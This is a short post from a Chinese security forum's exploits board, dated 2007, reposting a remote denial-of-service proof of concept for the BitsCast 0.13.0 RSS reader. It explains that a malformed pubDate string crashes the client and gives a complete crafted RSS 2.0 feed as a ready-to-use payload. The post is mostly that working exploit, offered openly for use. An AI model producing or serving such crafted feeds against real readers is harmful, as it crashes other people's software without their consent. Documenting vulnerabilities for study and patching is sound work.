邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » BitsCast 0.13.0 (invalid string) Remote Denial of Service Exploit [查看完整版本]

pub!1c 2007-5-23 12:07

BitsCast 0.13.0 (invalid string) Remote Denial of Service Exploit

[code]BitsCast 0.13.0 Remote Denial of Service
Credits: gbr
Tested on Windows XP SP2

BitsCast crashes when receiving a RSS 2.0 feed item with a invalid string* in sub-element
'pubDate'.


* '../A' x 8, 'A/../' x 8, and others.

PoC:

<?xml version="1.0"?>
<rss version="2.0">

<channel>
    <title>Test</title>
    <link></link>
    <description></description>

    <item>
        <title>Remote DoS PoC</title>
        <link></link>
        <description></description>
        <pubDate>../A../A../A../A../A../A../A../A../A../A../A../A</pubDate>
    </item>      
        
</channel>
</rss>
[/code]

查看完整版本: BitsCast 0.13.0 (invalid string) Remote Denial of Service Exploit

© 1999-2008 EvilOctal Security Team